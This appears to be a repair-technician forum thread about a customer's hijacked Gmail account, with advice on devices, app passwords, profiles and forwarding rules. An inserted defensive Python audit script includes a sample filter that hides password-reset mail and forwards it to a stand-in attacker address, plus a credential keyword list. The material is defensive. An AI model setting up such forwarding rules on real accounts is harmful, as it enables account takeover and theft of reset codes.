Customer was hacked, hacker keeps regaining access

Big Jim (Well-Known Member, Derbyshire, UK)
Not sure how the original hack happened, but the hacker gained access to the customer's iCloud account and left a weird message in the Notes app, and also had access to her Gmail account. She had all her account passwords stored in Notes, so she went about changing them all and writing them down on paper.

This is the point at which she brought it to me. I turned on 2-factor on her main accounts (iCloud/Microsoft); she already had login by phone activated on Gmail.

On her phone and tablet (iPhone/iPad), she gets a pop-up banner at the bottom of Outlook saying she needs to log in to her Gmail account. When she does so, the "hacker" is able to regain access to her account. I went through all of the security etc. with her for about an hour; just now I had a call that she logged in using this pop-up and got a notification that the unknown (to her) Mac had logged in to her account again.

So she is now going through the process of changing all her passwords again, whilst I try and work out what this pop-up is. It only appears in Outlook (which she uses to access her mail) and it's on both phone and tablet. I haven't ruled a virus out completely, but it doesn't sound like a virus to me.
If I try and log in to her Gmail account on a new device, it needs to use her phone to access it.
We changed the Gmail account password when she came into my shop. I don't understand how the hacker is able to regain access constantly without a password.
 
If they have her account set up on another iOS device, that may be it. She may need to log in and deauthorize all devices to ensure they don't have access on another iOS device.
 
Just to be clear, she doesn't have a PC, as in macOS or Winderz, only iOS devices? Did you turn off iCloud sharing/backup on all devices? Did you check the installed apps on the phone? Did you check the local settings in the Outlook app? Personally I'd get rid of Outlook. It's best used with Exchange. Use the Gmail app or the iOS Mail app.
 
She has a PC, an iPad and an iPhone.
Her PC hasn't been used for a year; the only devices showing in her Gmail account were her phone, her tablet and my computer when I was checking Gmail settings and security for her.

The Mac in question is the rogue device.
It keeps getting logged back in to her Gmail account. She removes the device from Gmail straight away every time it happens, but the pop-up keeps happening in the Outlook app on both phone and iPad.

So at this moment in time the issue isn't iCloud, it's the Gmail account; iCloud has now been secured with a new password and 2-factor.
The pop-up isn't a separate app (as far as I can tell); it's a pop-up in the Outlook app asking her to log in to the Gmail account, and this then re-authorises the hacker's Mac somehow.
How would the Mac regain access without the new password?

I have asked her to send me screenshots next time it happens.
She has already mentioned abandoning the gmail account and starting a new one, so perhaps that is the solution.
 
Check the link that @nlinecomputers posted and remove any devices that she doesn't own. Has she ever used any app passwords that have been generated by Gmail to allow her to use Outlook? It's a separate password from the account password, but it allows "authorised" apps to log in. Look in "third-party access" to check this and remove anything that doesn't need to be there.
 
> Check the link that @nlinecomputers posted and remove any devices that she doesn't own. Has she ever used any app passwords that have been generated by Gmail to allow her to use Outlook? It's a separate password from the account password, but it allows "authorised" apps to log in. Look in "third-party access" to check this and remove anything that doesn't need to be there.
I'm paranoid. I'd just nuke all of them and recreate any you need. Most users should have none, or only for older versions of Outlook.
 
Profiles?

I've cleaned these up a few times. Usually an old person. I find an email account on their phone that has some weird address, like a weather-related service or something. You can't remove it. Of course they don't know how it got there. Then I find a profile that was installed and remove it. Then I can remove the rogue email account.

Possible something like that is in play.
 
This happens a lot in Outlook, but I'm sure it's possible in Gmail too. Check the mail forwarding rules.

We have seen a number of hacks where they set the rules to archive messages immediately and forward them to an external account, so even if you change the password or 2FA, as long as that forward is in place they can still receive the reset emails for other accounts. I've even seen one where the rules were so specific: if the subject line contained "password" or "reset", archive and forward. All other mail goes to the inbox and the end user is none the wiser.
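The rule-based exfiltration described above is easy to miss by eye because Gmail shows filters one at a time. An added example, not part of this thread or of any Google tooling: the script below audits a Gmail filter export (Settings > Filters and Blocked Addresses > Export, an Atom feed with `apps:property` elements) and flags any filter that forwards mail, hides matches from the inbox, or keys on credential-related words. The sample export and the addresses in it are constructed for the example.

```python
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Filter actions that move a matching message out of the user's sight.
HIDE_PROPS = {"shouldArchive", "shouldTrash", "shouldMarkAsRead"}
# Match-criteria properties Gmail writes into the export.
CRITERIA_PROPS = ("from", "to", "subject", "hasTheWord", "doesNotHaveTheWord")
# Words an attacker uses to pick out password-reset and verification mail.
SENSITIVE_WORDS = ("password", "reset", "verification", "verify", "security code", "2fa")

# Constructed sample of a Gmail filter export (not a real account's data).
# Entry 1 is a normal labelling filter; entry 2 is the archive-and-forward
# pattern from the thread; entry 3 forwards without hiding anything.
SAMPLE_EXPORT = """<feed xmlns='http://www.w3.org/2005/Atom'
      xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry>
    <category term='filter'/>
    <title>Mail Filter</title>
    <apps:property name='from' value='newsletter@example.com'/>
    <apps:property name='label' value='Newsletters'/>
  </entry>
  <entry>
    <category term='filter'/>
    <title>Mail Filter</title>
    <apps:property name='subject' value='password OR reset'/>
    <apps:property name='shouldArchive' value='true'/>
    <apps:property name='shouldMarkAsRead' value='true'/>
    <apps:property name='forwardTo' value='attacker@example.net'/>
  </entry>
  <entry>
    <category term='filter'/>
    <title>Mail Filter</title>
    <apps:property name='hasTheWord' value='invoice'/>
    <apps:property name='forwardTo' value='accounts@example.org'/>
  </entry>
</feed>
"""


def parse_filters(xml_text):
    """Return one dict of property name -> value per filter entry."""
    root = ET.fromstring(xml_text)
    filters = []
    for entry in root.findall(ATOM + "entry"):
        props = {p.get("name"): p.get("value") for p in entry.findall(APPS + "property")}
        filters.append(props)
    return filters


def audit_filters(xml_text):
    """Flag filters that exfiltrate, hide, or target credential-related mail."""
    findings = []
    for props in parse_filters(xml_text):
        reasons = []
        if props.get("forwardTo"):
            reasons.append("forwards to " + props["forwardTo"])
        hidden = sorted(k for k in HIDE_PROPS if props.get(k) == "true")
        if hidden:
            reasons.append("hides matches (" + ", ".join(hidden) + ")")
        criteria = {k: props[k] for k in CRITERIA_PROPS if k in props}
        haystack = " ".join(criteria.values()).lower()
        if any(w in haystack for w in SENSITIVE_WORDS):
            reasons.append("matches credential-related mail")
        if reasons:
            findings.append({"criteria": criteria, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_filters(SAMPLE_EXPORT):
        print(f["criteria"], "->", "; ".join(f["reasons"]))
```

The export only contains filters. Account-level forwarding, POP/IMAP access and "Send mail as" addresses live on the Forwarding and POP/IMAP and Accounts tabs and must be checked separately; an attacker who set up a plain forwarding address will not show up in this file.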
 
Thanks for the help guys, the customer has opted to set up a new Gmail account instead.
I advised her that we really should secure this account anyway, but she hasn't replied to my email.
 
I honestly don't understand, whether hacking is involved or not, how people can just walk away from email accounts that they actually used extensively for years rather than deleting them.

If you have no intention of using an email account, particularly if it's one you actually did use rather than establishing it as a "junk email trap," then delete the thing. It's a kindness to your infrequent mailers, too, as they'll then get a bounce message and make the effort to look you up if they so desire. Letting people believe they've reached you, and getting no response back, is not a good look.
 
Well, unless she hard-deletes the account, that will not solve anything. The hacker still has access and can mine it for data, and nobody remembers to update ALL of your finance accounts with the new email address. You can't just walk away.

I was curious, so I did some digging to confirm. Once it's deleted it can NOT be remade. You didn't indicate that, but it reminded me of a creative way we recovered a client's domain a few years back.

I re-bought the domain and recreated the end user's email using my hosting provider's free webmail. Retrieved the password reset email and recovered their domains.

I was curious if someone else would be able to recreate an old gmail account. Turns out they thought that one through.
 
I know this is meandering way off-topic, but when it comes to the free e-mail services, it's something worth considering: What do they allow your executor to do after your passing? [This may even need to be checked as far as paid services.]

Google has (or had, but I don't think it's changed) the policy of granting executors of estates access to the email accounts that were owned by the person you're the executor for. Yahoo (which, now, who cares, but the principle applies) did not and would not.

Having been in this role now, twice, one of the duties I feel I have is "closing out" accounts, including email accounts, after the period of time where any possible business transactions that might flow through them would have already done so. Typically, that means about a year or so after the date of death.

One thing that it seems most people aren't taking any notice of is what happens to their cyber-world, including things like email accounts, Facebook, etc., after their passing. Those things really do need to be considered.
 
> Well, unless she hard-deletes the account, that will not solve anything. The hacker still has access and can mine it for data, and nobody remembers to update ALL of your finance accounts with the new email address. You can't just walk away.

I haven't walked away; the client has. I responded to tell her that she/we need(s) to secure the old address, and she has ignored me thus far.
 